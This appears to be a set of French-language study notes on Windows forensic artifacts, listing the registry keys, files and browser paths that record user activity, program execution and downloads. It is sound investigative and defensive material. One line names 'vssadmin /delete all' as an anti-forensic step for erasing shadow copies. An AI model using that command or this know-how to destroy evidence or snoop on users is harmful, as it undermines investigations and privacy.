● Fichier de sauvegarde


La corbeille contient tout d’abord un répertoire racine contenant des

sous-répertoires au noms des SID présents sur la machine.

Chaque SID peut être mis en relation avec un utilisateur via le registre

ou la commande

Get-WmiObject win32_useraccount | Select name,

sid

Les fichiers commençant par $I files contiennent le chemin d’origine du

fichier et la date et heure de suppression

Les fichiers commençant par $R sont les fichiers de sauvegarde des

fichiers supprimés


● C:\$Recycle.bin

Thumbcache.db

● Miniatures des documents présents dans un répertoires

● Chemin du répertoire

● Même si le répertoire est supprimé

● Même si le fichier est supprimé

● Même si le périphérique est déconnecté


Les miniatures d’images, de document et répertoires persistent dans

une base de données appelée thumbcache.db. Chaque utilisateur a sa

propre base. Les miniatures enregistrées sont récupérables en

plusieurs formats : small, medium, large, extra-large. Elles sont

enregistrée dans l’une de ces catégories en fonction du type

d’affichage de l’utilisateur.



● C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\Expl

orer

Thumb.db

●Miniature d’une image

● Miniature du fichier (même si supprimé)

● Dernière modification (XP)

● Nom de fichier d’origine (XP)


Il s’agit d’un fichier caché dans un répertoire. Les miniatures des

images et icônes de fichiers sont enregistré dans le fichier thumbs.db.

Ce fichier est créé automatiquement lorsque le partage réseaux

homegroup est activé ou lorsqu’un répertoire est accédé via un chemin

UNC.

Recherches (WordWheelQuery)

●Mots-clés recherché par l’utilisateur dans le champ recherché

●Mots-clés recherché par l’utilisateur dans le menu démarrer

●Date et heure de la recherche


Il s’agit des mots clés saisis par l’utilisateur dans la bar de recherche ou

le menu démarrer depuis Windows 7. Les mots clés sont au format

unicode et listé de manière chronologique dans la sous-clé MRUList.


C:\Users\*\NTUSER.DAT


●NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex

plorer\WordWheelQuery

Artefacts fichiers / dossiers
$I30

Dans chaque répertoire avec au moins un fichier, il a un fichier $I30


offset de demarrage

mmls /dev/sdb

Fichiers Récents

●Possibilité de retrouver les 150 derniers fichiers récents.

●La date de modification du registre correspond à la date d’ouverture/d’accès et permet d’

établir une chronologie.

●La sous-clé folder permet de retrouver les répertoires ouverts par l’utilisateur.


Cette clé de registre va suivre les derniers fichiers et répertoires

ouverts. Ces fichiers sont accessibles depuis “mes fichiers récents”

dans la barre de navigation latérale.


C:\Users\*\NTUSER.DAT


●NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex

plorer\RecentDocs

Shell Bags

●Accès à des répertoires (Locaux ou sur le réseau)

●Accès à des périphériques

●Date et heure d’accès

●Même si le périphérique est débranché ou le répertoire supprimé


Les shell bags permettent de déterminer les accès à des répertoires

sur

la machine locale, le réseau ou des périphériques externes. Il est

possible de retrouver des répertoires supprimés ou modifiés et la

dernière date à laquelle l’utilisateur y a eu accès.


C:\Users\*\AppData\Local\Microsoft\Windows\USRCLASS.DAT

C:\Users\*\NTUSER.DAT


Explorer :

●USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags

●USRCLASS.DAT\LocalSettings\Software\Microsoft\Windows\Shell\BagMRU

Desktop :

●NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU

●NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags

IE/EDGE (file://)

● Date et heure d’ouverture

● Chemin du fichier

● index.dat > file:///C:/chemin/nomdufichier.ext


Un des comportements méconnus de l’historique IE est qu’il

n’enregistre pas que les sites internet consultés mais bel et bien des

accès à des fichiers du disque (ou partages réseau). Il va de soi que cet

historique apporte énormément d’information en terme de

temporalité.

● %USERPROFILE%\Local Settings\History\ History.IE5

● %USERPROFILE%\AppData\Local\Microsoft\Windows\History\

History.IE5

● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac

he\WebCacheV*.dat%

Artefacts d’exécution
Last visited MRU

● Traque les programmes utilisés pour ouvrir des fichiers via OpenSaveMRU

● Extension des fichiers ouverts

● Noms de fichiers ouverts

● Application utilisée pour ouvrir un fichier

● Chemin de l’application

● Chronologie possible


Traque les exécutables utilisés par une application pour ouvrir un document (présent dans OpenSaveMRU). De plus, chaque valeur associe le répertoire ou le fichier a été ouvert par cette application.

● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\ LastVisitedMRU

● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\ LastVisitedPidlMRU

ADS stream

affichage dir /r

more < normal.txt:$DATA

$MFT

c:\$MFT

attrib -s -h $MFT

CCM_RecentlyUsedApps
AppCompatFlags Registry Keys
JumpLists
Timeline Windows 10

● Applications démarrées

● Date d’exécution

● Focus par application


Windows 10 enregistre toutes les applications qui ont été utilisées récemment et propose à l’utilisateur une timeline accessible avec les touches suivantes > WIN+TAB.

Ces données sont enregistrées au format SQLite.


C:\Users\<username>\AppData\Local\ConnectedDevicesPlatfor m\<random>\ActivitiesCache.db



Background Activity Monitor (BAM)
Amcache / RecentFileCache.bcf

Amcache.hve

● Une entrée pour chaque exécutable

● Chemin d’exécution et volume associé

● $StandardInfo

● Démarré pour la première fois : Last Modification

● SHA1 de l’exécutable


ProgramDataUpdater (une tâche associée au service ‘Application Experience’) utilise la ruche Amcache.hve pour stocker de la donnée lors de la création de process.


● C:\Windows\AppCompat\Programs\Amcache.hve


MUICache

NTUSER.DAT

System Resource Usage Monitor (SRUM)
prefetch

 C:\Windows\Prefetch

fichier caché

UserAssist

NTUSER.DAT


Tous les programmes basés sur un GUI, exécutés sont historisés dans :

● NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Ex plorer\UserAssist\GUID}\Count


Les données récupérées incluent la précieuse information : L’utilisateur a exécuté le programme depuis un raccourci ou depuis le fichier original. Cela apporte à l’investigation des précisions sur le contexte de lancement d’un programme.

Les valeurs encodées en ROT-13.


RecentApps

● AppID : Nom de l’application

● LastAccessTime : Dernière exécution (UTC+0)

● LaunchCount : Nombre de fois que le programme a été lancé


L’exécution de programmes sur Windows 10 sont enregistrées en base de registre.


● NTUSER.DAT\Software\Microsoft\Windows\Current Version\Search\RecentApps


Chaque clé GUID pointe sur une application récente.

RunMRU
Volume Shadow Copies

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore

vssadmin /list shadows (“/delete all” => anti-forensic)

vss_carver (github) : Format de disque .raw

forensic explorer (payant)


Shimcache

● Nom de fichier exécutable

● Chemin d’exécution

● Taille de fichier

● Timestamp dernière modification

● LastUpdateTime est mis à jour quand un programme est exécuté


Windows Application Compatibility Database est utilisée par Windows pour vérifier si une application doit démarrer en mode de compatibilité. Chaque exécutable qui a été démarré doit se trouver dans cette clé. Le but est de déterminer quel programme a été lancé et quand.

Windows XP contient 96 entrées max. Windows 7+ contient 1024 entrées max. LastUpdateTime n’existe plus à partir de Windows 7+.


C:\Windows\System32\config


● SYSTEM\CurrentControlSet\Control\SessionManager\AppCom patibility

● SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

SRUM

● Performances

● Applications démarrées (Comptes associés)

● Trafic réseau (Nombre de bytes envoyés et reçus par l’application)


Fait son apparition à partir de Windows 8.1 Enregistre 30 à 60 d’historique d’activité de la machine.


● SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SRUM\Exte nsions{d10ca2fe-6fcf4f6d-848e-b2e99266fa89}

● C:\Windows\System32\SRU\


Artefacts Internet
Alternate Data Stream : Zone.Identifer

● URLZONE_TRUSTED (ZoneID 2 )

● URLZONE_INTERNET (ZoneID 3)

● URLZONE_UNTRUSTED (ZoneID 4)


Depuis Windows XP SP2 lorsque des fichiers sont téléchargés depuis le web via un navigateur pour être stockés sur un système NTFS, un flux ADS est associé aux fichiers : Alternate Data Stream ‘Zone.Identifier’

1 : Local

2 : Trusted

3: Internet

4 : Unrusted


Les fichiers avec un flux ADS Zone.Identifier ZoneID=3 proviennent d’internet


Téléchargements

● Nom du fichier

● Taille

● Type

● Téléchargé depuis

● Referrer

● Chemin de sauvegarde

● Application utilisée pour ouvrir le fichier

● Date de début et date de fin de téléchargement


Firefox et IE ont comme fonctionnalité native un download manager. Celui-ci conserve un historique de tout ce qui a été téléchargé par l’utilisateur.

● %USERPROFILE%\Application Data\Mozilla\ Firefox\Profiles\.default\downloads.sqlite

● %USERPROFILE%\AppData\Roaming\Mozilla\ Firefox\Profiles\.default\downloads.sqlite

● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\IED ownloadHistory\

● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat

Navigateurs

● Fichiers ouverts via un navigateur

● Date et heure de consultation

● N’implique pas forcément un téléchargement


A dissocier du répertoire téléchargement.

Les navigateurs logent aussi dans l’historique les fichiers qui ont été téléchargés depuis un site web et ouverts via le navigateur directement.

ex : Téléchargement d’un .pdf et ouverture de ce PDF avec Chrome

● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\IED ownloadHistory\index.dat

● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat

● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\. default\downloads.sqlite

● %USERPROFILE%\AppData\Roaming\Mozilla\ Firefox\Profiles\.default\places.sqlite

● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History


Skype

● Date et heure des communications

● Profil skype associé à chaque action

● Fichiers envoyés


L’historique Skype garde des logs des sessions de communications et des fichiers transférés d’une machine à l’autre. Par défaut, les logs sont activés.

● C:\Documents and Settings\\Application\Skype\

● C:\%USERPROFILE%\AppData\Roaming\Skype\


Pièce jointe

80% des données données fournies par les e-mails sont en pièce jointe. Les e-mails standards ne contiennent que du texte alors que ses pièces jointes sont encodées au format MIME/base64.

● .ost / .pst : Format Microsoft Outlook

● .mbox : Format Unix


● %USERPROFILE%\Local Settings\ApplicationData\Microsoft\Outlook

● %USERPROFILE%\AppData\Local\Microsoft\Outlook



Open/Save MRU

● Traque les fichiers ouverts ou enregistrés récemment (toutes extensions confondues)

● Stocke des informations relatives aux fichiers ayant déclenché la boîte de dialogue “Ouvrir” ou “Enregistrer”


Pour faire simple, chaque fichier ayant été ouvert ou enregistré (par l’intermédiaire d’une boîte de dialogue Windows) est historisé en base de registre. Les fichiers enregistrée par le biais d’un navigateur web actionnent cette boîte de dialogue.

● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\OpenSaveMRU

● NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Ex plorer\ComDlg32\OpenSavePIDlMRU

Cookies

● Énumération des domaines consultés

● Timestamp des cookies

● Nombre de visites

● Les pages consultées lors de la session

● Les liens sortants

● Méthodes d’accès (depuis un e-mail, direct, depuis un autre site, Google AdWords)

● Mots-clés utilisés pour trouver le site web (si pas de SSL)

● Timestamp de création de cookie et la dernière fois qu’il a été utilisé

● Récupération de cookies supplémentaires (Google Analytics / Flash)


Google Analytics (GA) a développé une méthodologie très sophistiquée pour traquer les visites des sites webs et relever bon nombre de statistiques. De nos jours il est tellement répandu qu’il couvre 50% des sites web. Sur la totalité des sites web utilisant un système de tracking GA prend 80% de part de marché.

Les Local Stored Objects (LSOs) ou cookies flash ne sont plus très répandus du fait que Flash est en perte de vitesse de nos jours et les sites utilisant cette technologie se font de plus en plus rares.

Leur particularité est qu’ils n’ont pas de date d’expiration et les navigateurs ne possèdent pas de fonctions natives pour les supprimer.

● %APPDATA%\Roaming\Macromedia\FlashPlayer\#SharedObjects

● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Cookies

● %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCookies

● %USERPROFILE%\AppData\Local\Packages\microsoft.microsoftedge _<APPID>\AC\MicrosoftEdge\Cookies

● %USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\<randomtext>.default\cookies.sqlite

● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<rando mtext>.default\cookies.sqlite

● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\Local Storage\

● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Local Storage\

Session Restaurée

● Restauration des onglets ouverts après la fermeture du navigateur.

● Historique des sites vus depuis chaque onglet

● Timestamp des fermetures de sessions

● Timestamp de création des fichiers ‘.dat’ dans le répertoire Active

● Timestamp de modification des fichiers ‘.dat’ dans le répertoire LastActive

● Nombre de fois que l’onglet à été ouvert (seulement en cas de crash navigateur)


Fichiers à examiner sont Current Session, Current Tabs, Last Session, Last Tabs.

● %USERPROFILE%/AppData/Local/Microsoft/Internet Explorer/Recovery

● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\ <randomtext>.default\sessionstore.js

● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\


Cache

● Identification des sites web visités

● Fourni certain fichiers présents sur la page lors de la visite

● Ces fichiers sont triés selon les comptes locaux de la machine

● Les timestamps récupérables sont la première et la dernière visite


Le cache de navigation représente l’endroit où les composants d’un site internet sont stockés afin d’améliorer les performances lors de la navigation internet. Cela permet de prendre des timestamps et de connaître précisément l’activité en ligne de l’utilisateur à un moment donné.


● %USERPROFILE%\AppData\Local\Microsoft\Windows\Tempor aryInternet Files\Content.IE5

● %USERPROFILE%\AppData\Local\Microsoft\Windows\Tempor aryInternet Files\Content.IE5

● %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCac he\IE

● %USERPROFILE%\AppData\Local\Packages\microsoft.microsof tedge_<APPID>\AC\MicrosoftEdge\CacheFirefox

● %USERPROFILE%\Local Settings\ApplicationData\Mozilla\Firefox\Profiles\<randomtext >.default\Cache

● %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles\<randomte xt>.default\Cache

● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\Cache - data_#/af_######

● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Cache\ - data_#/f_######

Historique de navigation

● Enregistrement des sites internet visités classés par date.

● Stocké pour chaque utilisateur local.

● Enregistrement du nombre de visites (la fréquence)

● Log l’accès au système de fichiers


● %USERPROFILE%\AppData\Local\Microsoft\Windows\History\

● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat

● %USERPROFILE%\ApplicationData\Mozilla\Firefox\Profiles\<ra ndomtext>.default\places.sqlite

● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\ <randomtext>.default\places.sqlite

● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\History

● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History



Liens

Andrea fortuna
mutex well know
cyberforensicator.com
pastebin
https://www.zoomeye.org/
insecam.org
Smash

site pour le transfert


pentesteracademy
Event log to monitor
MITRE ATT&CK
Caret
Car
Matrice
ESD Academy
poster